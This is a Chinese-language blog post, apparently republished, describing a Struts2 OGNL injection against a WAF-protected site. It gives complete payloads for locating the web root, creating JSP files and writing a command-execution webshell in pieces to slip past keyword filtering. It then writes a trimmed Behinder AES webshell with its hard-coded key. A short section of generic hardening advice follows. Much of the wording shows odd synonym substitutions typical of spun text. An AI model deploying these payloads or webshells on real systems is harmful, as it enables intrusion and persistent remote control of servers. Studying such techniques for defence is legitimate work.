继之前的Struts2绕过waf读写文件之后,碰着了一个实例,分享一下思路。
0x01 背景朋友发来一个struts2有waf的站点,能检测到漏洞,但是命令实行不了,上传shell肯定也就弗成了,估计是检测了关键字,直接开干
0x02 写命令实行马一开始的思路是访问站点的jsp文件,比如http://xx.xxx/123.jsp测试有没有全局拦截,很显然,这里是没有的
直接可以进行写shell,先找绝对路径
0x001 查看web目录%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get(34;com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
这里web目录是/usr/local/tomcat/webapps/ROOT/,直接写个文件到/usr/local/tomcat/webapps/ROOT/3.jsp
0x002 创建文件%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/3.jsp"),#bb0.flush(),#response.flush(),#response.close()}
这里写文件碰着了困难,缘故原由在于涌现了关键字getRuntime(),但是是可以绕过的,分批次进行写入文件,本地进行测试如下
package Struts2bypasswaf; import java.io.BufferedWriter; import java.io.IOException; / @author f0ng @date 2022/5/24 /public class teststruts2 { public static void main(String[] args) throws IOException { BufferedWriter aaa = new java.io.BufferedWriter(new java.io.FileWriter("1.txt",true)); aaa.append("\""); aaa.flush(); aaa.close(); } }
原始文件如下
实行Java代码后
可以创造双引号被追加写入了(这里为什么拎出来双引号,由于须要转义)
写文件分段1
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/3.jsp",true)),#bb0.append("<% java.io.InputStream in = Runtime.getRun"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}
写文件分段2
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/3.jsp",true)),#bb0.append("time().exec(request.getParameter(\"pass\")).getInputStream();int a = -1;byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));} %>"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}
访问webshell即可
0x03 写入冰蝎马
这时候朋友又说了,这个webshell不可操作,他不喜好
那么仿造之前的方法写个冰蝎给他不就行了,前面都是一样的,给出数据包
创建文件:
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/43.jsp"),#bb0.flush(),#response.flush(),#response.close()}
写入文件:
内容是
<%@page import="java.util.,javax.crypto.,javax.crypto.spec."%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/43.jsp",true)),#bb0.append("<%@page import=\"java.util.,javax.crypto.,javax.crypto.spec.\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}
后面再写就创造出问题了,怎么都写不进去,但是一个一个字符是可以的,那么就可以单个字符进行追加写入;但是又碰着了一个问题,单个字符的{和}写不进去,缘故原由暂不清楚,以是直接阉割了冰蝎马,后面为:
<% String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
去除了if (request.getMethod().equals("POST")){}把稳要将%改为%25,要将"改为\"",转义
连接成功
0x04 总结对付通过http去写入分外字符,要考虑URL编码以及转义的问题,如%变成了%25,"变成了\";利用到实战之前现在本地环境进行复现是很有必要的;文件落地比较麻烦,如果可以注入内存马那是比较方便的。0x05 参考
https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ 【struts2绕过waf读写文件及另类办法实行命令】
https://github.com/vulhub/vulhub/tree/master/struts2/s2-016 【Struts2 016环境】
from https://mp.weixin.qq.com/s/31nUrF1v50-J2v6IOYzNYA
Struts2 是一个广泛利用的 Web 运用程序框架,但是由于其繁芜的构造和高度可配置性,也存在一些安全风险,攻击者可以利用这些漏洞进行远程代码实行、文件读取等攻击。一些站点为了防御这些攻击,会利用 Web 运用程序防火墙(WAF)来进行防御。但是,WAF 并不能完备办理所有的安全问题,以下是一些建议:
及时更新 Struts2 版本,确保漏洞得到及时修复。对用户输入的数据进行严格的校验和过滤,避免通过用户输入的数据布局恶意要求。启用安全的开拓实践,如利用安全的密码存储和传输方案、利用 CSRF token 戒备 CSRF 攻击等。配置精确的权限掌握策略,限定用户访问敏感资源的权限。将运用程序支配在安全的环境中,如安全的操作系统、数据库等,避免由于操作系统或数据库的漏洞导致运用程序受到攻击。对系统日志进行监控,及时创造和相应非常要乞降攻击行为。不要过分依赖 WAF,WAF 可以起到一定的防御浸染,但并不能完备担保系统的安全,因此须要进行综合的安全风险评估和戒备方法。须要把稳的是,以上建议只是一些基本的戒备方法,对付特定的运用处景和攻击办法,可能须要针对性的戒备方法。因此,在开拓和支配运用程序时,还须要根据详细情形综合考虑各种安全风险,并采纳相应的戒备方法。